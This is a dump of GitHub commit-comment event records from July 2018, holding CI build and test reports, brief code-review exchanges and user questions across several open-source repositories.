{"id":"7915629160","type":"CommitCommentEvent","actor":{"login":"BrianBohe"},"repo":{"name":"shezka/tleng"},"payload":{"comment":{"id":29588587,"position":null,"line":null,"path":null,"commit_id":"a741ef82d3f71ba3de594406c8a9d94916e370c7","created_at":"2018-07-04T00:31:57Z","updated_at":"2018-07-04T00:31:57Z","author_association":"COLLABORATOR","body":"Ese aporte si que se deja ver papa"}},"created_at":"2018-07-04T00:31:57Z"}
{"id":"7915629961","type":"CommitCommentEvent","actor":{"login":"AndyK70"},"repo":{"name":"Courseplay/courseplay"},"payload":{"comment":{"id":29588592,"position":null,"line":null,"path":null,"commit_id":"69c7b88a3934ee3b9a46b0b414d1ce087b4e9506","created_at":"2018-07-04T00:32:21Z","updated_at":"2018-07-04T00:32:21Z","author_association":"NONE","body":"@ThomasGaertner RL takes much time, yeah. Got a family, I now what you are talking about. 😄\r\nOn some days a week I got a couple of hours to work on code. If I'm in the right mood I'm looking into GPS and/or CP otherwise I'm just farming along. \r\nWhen I got something ready I'll let you know and make a pull request."}},"created_at":"2018-07-04T00:32:21Z"}
{"id":"7915632170","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29588597,"position":null,"line":null,"path":null,"commit_id":"8a1db43d70f06902781eb4137c84405b8a8d66a7","created_at":"2018-07-04T00:33:19Z","updated_at":"2018-07-04T00:33:19Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/60/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/60//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/8a1db43d70f06902781eb4137c84405b8a8d66a7/60/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/8a1db43d70f06902781eb4137c84405b8a8d66a7/60/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/8a1db43d70f06902781eb4137c84405b8a8d66a7/60/jenkins-results/generator-diff/index.html) (please review changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/8a1db43d70f06902781eb4137c84405b8a8d66a7/60/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n150 tests failed, 11 tests passed.\n\n## Failed tests\n\n * apitest/Mac Unified: Failed (Test run crashed (exit code: 134).)\n * monotouch-test/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mini/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * link all/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link all/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mini/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * link all/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link all/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * mini/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * link all/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * link all/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * mini/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * link all/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * link all/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n"}},"created_at":"2018-07-04T00:33:19Z"}
{"id":"7915653703","type":"CommitCommentEvent","actor":{"login":"bencaradocdavies"},"repo":{"name":"geoserver/geoserver"},"payload":{"comment":{"id":29588637,"position":22,"line":20,"path":"src/main/src/main/java/org/geoserver/ows/ProxifyingURLMangler.java","commit_id":"3c05cfb84151fbcdf5bde6d4d42faa4d743673e9","created_at":"2018-07-04T00:43:19Z","updated_at":"2018-07-04T00:43:19Z","author_association":"MEMBER","body":"@lmoran is this covered by a unit test?"}},"created_at":"2018-07-04T00:43:19Z"}
{"id":"7915653885","type":"CommitCommentEvent","actor":{"login":"lmoran"},"repo":{"name":"geoserver/geoserver"},"payload":{"comment":{"id":29588638,"position":22,"line":20,"path":"src/main/src/main/java/org/geoserver/ows/ProxifyingURLMangler.java","commit_id":"3c05cfb84151fbcdf5bde6d4d42faa4d743673e9","created_at":"2018-07-04T00:43:25Z","updated_at":"2018-07-04T00:43:25Z","author_association":"CONTRIBUTOR","body":"Indeed, Thanks for spotting it."}},"created_at":"2018-07-04T00:43:25Z"}
{"id":"7915654752","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29588641,"position":null,"line":null,"path":null,"commit_id":"6642edfad9b10bc38ce6764a9aed15adf9b55e79","created_at":"2018-07-04T00:43:51Z","updated_at":"2018-07-04T00:43:51Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Графика: переделать системы.](https://trello.com/c/clOQD18V/31-%D0%B3%D1%80%D0%B0%D1%84%D0%B8%D0%BA%D0%B0-%D0%BF%D0%B5%D1%80%D0%B5%D0%B4%D0%B5%D0%BB%D0%B0%D1%82%D1%8C-%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D1%8B)"}},"created_at":"2018-07-04T00:43:51Z"}
{"id":"7915655083","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":29588643,"position":null,"line":null,"path":null,"commit_id":"690da23dac24d4ed5ffd3deb746b3db6da46b058","created_at":"2018-07-04T00:44:00Z","updated_at":"2018-07-04T00:44:00Z","author_association":"NONE","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 150](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1921&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2018-07-04T00:44:00Z"}
{"id":"7915656693","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29588648,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-04T00:44:48Z","updated_at":"2018-07-04T00:44:48Z","author_association":"NONE","body":"The guidelines are not only to protect our limited computational resources per si. **The guidelines follow some programming principles based on the fact that a patch should walk with its own legs**. This is for simplicity and a clear code that will sum up lately in a better program and maintenance of the project.\r\n\r\nIf a patch shows it is not good enough to pass the boundaries this means it is not strong enough to spend lines of the code and cycles of the processor. If you commit such patch it will fulfill the space of a better patch in the future and continuously make the program less efficient. \r\n   "}},"created_at":"2018-07-04T00:44:48Z"}
{"id":"7915658057","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":29588654,"position":null,"line":null,"path":null,"commit_id":"690da23dac24d4ed5ffd3deb746b3db6da46b058","created_at":"2018-07-04T00:45:26Z","updated_at":"2018-07-04T00:45:26Z","author_association":"NONE","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 150](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1921&buildTypeId=XbimEssentials_XbimEssentials) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:25"}},"created_at":"2018-07-04T00:45:26Z"}
{"id":"7915658890","type":"CommitCommentEvent","actor":{"login":"kevin111263"},"repo":{"name":"kodi-connect/kodi-connect-addon"},"payload":{"comment":{"id":29588657,"position":null,"line":null,"path":null,"commit_id":"0f358dc093cd697697ce1bd1784cfbfe00b0e40f","created_at":"2018-07-04T00:45:44Z","updated_at":"2018-07-04T00:45:44Z","author_association":"NONE","body":"Hi Tomas Great Video and I like that Alexa with Kodi Skill a lot!! can I try it I've been looking for something like that please thank you you're the best here's my email kevin_kc200912@yahoo.com"}},"created_at":"2018-07-04T00:45:44Z"}
{"id":"7915659584","type":"CommitCommentEvent","actor":{"login":"lmoran"},"repo":{"name":"geoserver/geoserver"},"payload":{"comment":{"id":29588658,"position":22,"line":20,"path":"src/main/src/main/java/org/geoserver/ows/ProxifyingURLMangler.java","commit_id":"3c05cfb84151fbcdf5bde6d4d42faa4d743673e9","created_at":"2018-07-04T00:46:06Z","updated_at":"2018-07-04T00:46:06Z","author_association":"CONTRIBUTOR","body":"Yes @bencaradocdavies , it is supposed to be covered by {{testProxyBaseURLFlagSetWithTemplateForwarded}}, I will look into it as well."}},"created_at":"2018-07-04T00:46:06Z"}
{"id":"7915661226","type":"CommitCommentEvent","actor":{"login":"dcrowder2"},"repo":{"name":"dcrowder2/cbcc"},"payload":{"comment":{"id":29588662,"position":null,"line":null,"path":null,"commit_id":"3b413cfb9fddebde8f5d945cdd5192e1fafd8a1f","created_at":"2018-07-04T00:46:53Z","updated_at":"2018-07-04T00:46:53Z","author_association":"OWNER","body":"Done diddly added a run image method\r\n"}},"created_at":"2018-07-04T00:46:53Z"}
{"id":"7915665003","type":"CommitCommentEvent","actor":{"login":"Tihomir96"},"repo":{"name":"CodexioDevCamp-TeamIII/ConferenceScheduler"},"payload":{"comment":{"id":29588681,"position":9,"line":8,"path":"src/main/java/com/teamthree/conferencescheduler/app_utils/UserUtil.java","commit_id":"0975651f1ff13813039ca68ad137f69dbf4cd02f","created_at":"2018-07-04T00:48:42Z","updated_at":"2018-07-04T00:48:42Z","author_association":"CONTRIBUTOR","body":"fix this tommorrow morning"}},"created_at":"2018-07-04T00:48:42Z"}
{"id":"7915669118","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29588690,"position":null,"line":null,"path":null,"commit_id":"de187b3bc9d168a8f0ba904fb4cbbf679414ad76","created_at":"2018-07-04T00:50:38Z","updated_at":"2018-07-04T00:50:38Z","author_association":"COLLABORATOR","body":"<h3>add Omnibar tests!</h3>\n\nPreview: <strong><a href='https://17825-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://17825-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://17825-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-04T00:50:38Z"}
{"id":"7915670931","type":"CommitCommentEvent","actor":{"login":"mahamadougit"},"repo":{"name":"ethereum/browser-solidity"},"payload":{"comment":{"id":29588696,"position":null,"line":null,"path":null,"commit_id":"5959e69d70bb968d9632e4f76f1c77247a88d64d","created_at":"2018-07-04T00:51:26Z","updated_at":"2018-07-04T00:51:26Z","author_association":"NONE","body":"please how can i work with remix offline?"}},"created_at":"2018-07-04T00:51:26Z"}
{"id":"7915673682","type":"CommitCommentEvent","actor":{"login":"orivej"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29588705,"position":null,"line":null,"path":null,"commit_id":"0068fea88cf6d9e1efe031753f9e48a424967ef8","created_at":"2018-07-04T00:52:40Z","updated_at":"2018-07-04T00:52:40Z","author_association":"MEMBER","body":"I don't know if this is important, but I have noticed that Nix 1.11.16 (`nix1`) fails to evaluate derivations with such `sha512` hashes with errors like:\r\n```\r\nerror: hash ‘OX8XqP7/1a9cqkxYw2yXss15f26NKWBpDXQd0/uK/KPqdQhxbPa994hnzjcE2VqQpDslf55723cKPUOGSmMY3g==’ has wrong length for hash type ‘sha512’\r\n```"}},"created_at":"2018-07-04T00:52:40Z"}
{"id":"7915675646","type":"CommitCommentEvent","actor":{"login":"zanussbaum"},"repo":{"name":"zanussbaum/Telepresence-Robot"},"payload":{"comment":{"id":29588710,"position":22,"line":46,"path":"robot/static/js/layout.js","commit_id":"3373a7ee2cc867cbd8738e354031304ae395ee0e","created_at":"2018-07-04T00:53:34Z","updated_at":"2018-07-04T00:53:34Z","author_association":"OWNER","body":"Added so the css file could style the button container "}},"created_at":"2018-07-04T00:53:34Z"}
{"id":"7915677771","type":"CommitCommentEvent","actor":{"login":"morpheus9999"},"repo":{"name":"uber/phabricator-jenkins-plugin"},"payload":{"comment":{"id":29588719,"position":18,"line":65,"path":"src/main/java/com/uber/jenkins/phabricator/conduit/DifferentialClient.java","commit_id":"5f85f41f693f1f26ad34d8eb9fdfc27b13c8fe6d","created_at":"2018-07-04T00:54:30Z","updated_at":"2018-07-04T00:54:30Z","author_association":"NONE","body":"@sectioneight  Why did you changed \"response\" to \"result\"? "}},"created_at":"2018-07-04T00:54:30Z"}
{"id":"7915677960","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29588720,"position":null,"line":null,"path":null,"commit_id":"093cde96412f72f93dca482cccddecb720b1666f","created_at":"2018-07-04T00:54:35Z","updated_at":"2018-07-04T00:54:35Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-691](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-691).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-691-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-04T00:54:35Z"}
{"id":"7915678255","type":"CommitCommentEvent","actor":{"login":"Nickheythatsme"},"repo":{"name":"Nickheythatsme/SentimentAnalysis"},"payload":{"comment":{"id":29588722,"position":null,"line":null,"path":null,"commit_id":"1a3ac4660b6ac307dad2a1d68b1022118f997e96","created_at":"2018-07-04T00:54:43Z","updated_at":"2018-07-04T00:54:43Z","author_association":"OWNER","body":"[0/1] Running tests...\nTest project /u/grout2/Programming/SentimentAnalysis/_debug\n    Start 1: parse_test\n1/2 Test #1: parse_test .......................   Passed    0.01 sec\n    Start 2: btree\n2/2 Test #2: btree ............................***Exception: SegFault  0.10 sec\n\n50% tests passed, 1 tests failed out of 2\n\nTotal Test time (real) =   0.13 sec\n\nThe following tests FAILED:\n\t  2 - btree (SEGFAULT)\nFAILED: CMakeFiles/test.util \ncd /u/grout2/Programming/SentimentAnalysis/_debug && /usr/bin/ctest --force-new-ctest-process\nninja: build stopped: subcommand failed.\n"}},"created_at":"2018-07-04T00:54:43Z"}
{"id":"7915678540","type":"CommitCommentEvent","actor":{"login":"TheoWolf"},"repo":{"name":"databrary/datavyu-ffmpegplugin"},"payload":{"comment":{"id":29588725,"position":18,"line":123,"path":"src/main/cpp/PacketQueue.hpp","commit_id":"3e8b549ee47f31c557dffc7eca872efdc74ec718","created_at":"2018-07-04T00:54:52Z","updated_at":"2018-07-04T00:54:52Z","author_association":"CONTRIBUTOR","body":"The packet Serial is passed into the Clock constructor, this should return a reference to the serial."}},"created_at":"2018-07-04T00:54:52Z"}
{"id":"7915679637","type":"CommitCommentEvent","actor":{"login":"244304828"},"repo":{"name":"daliansky/dell7000"},"payload":{"comment":{"id":29588728,"position":null,"line":null,"path":null,"commit_id":"211f135074ea1cc424b480887e9fdf28d75f439a","created_at":"2018-07-04T00:55:22Z","updated_at":"2018-07-04T00:55:22Z","author_association":"NONE","body":"thinks!"}},"created_at":"2018-07-04T00:55:22Z"}
{"id":"7915680679","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29588730,"position":null,"line":null,"path":null,"commit_id":"8b080bf8e50fe39bce233996df702e205a749a0d","created_at":"2018-07-04T00:55:51Z","updated_at":"2018-07-04T00:55:51Z","author_association":"OWNER","body":"Added an option to hide the window when a new match is found.\r\nFixes #4 "}},"created_at":"2018-07-04T00:55:51Z"}
{"id":"7915683353","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29588738,"position":null,"line":null,"path":null,"commit_id":"df50f667af86b54f03400de4c53217d4bb1c015e","created_at":"2018-07-04T00:57:06Z","updated_at":"2018-07-04T00:57:06Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/revert-4227-gh4225/1/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 143\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/revert-4227-gh4225/1//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/revert-4227-gh4225/df50f667af86b54f03400de4c53217d4bb1c015e/1/jenkins-results/api-diff/index.html)\n⚠️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/revert-4227-gh4225/df50f667af86b54f03400de4c53217d4bb1c015e/1/jenkins-results/apicomparison/index.html) (🔥 breaking changes 🔥)\nℹ️ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/revert-4227-gh4225/df50f667af86b54f03400de4c53217d4bb1c015e/1/jenkins-results/generator-diff/index.html) (please review changes)\n🔥 [Failed to publish results](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/revert-4227-gh4225/1//console) 🔥\n"}},"created_at":"2018-07-04T00:57:06Z"}
{"id":"7915684242","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29588740,"position":null,"line":null,"path":null,"commit_id":"17da88b8126faaf9924f28b393eda940ae879418","created_at":"2018-07-04T00:57:30Z","updated_at":"2018-07-04T00:57:30Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-692](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-692).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-692-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-04T00:57:30Z"}
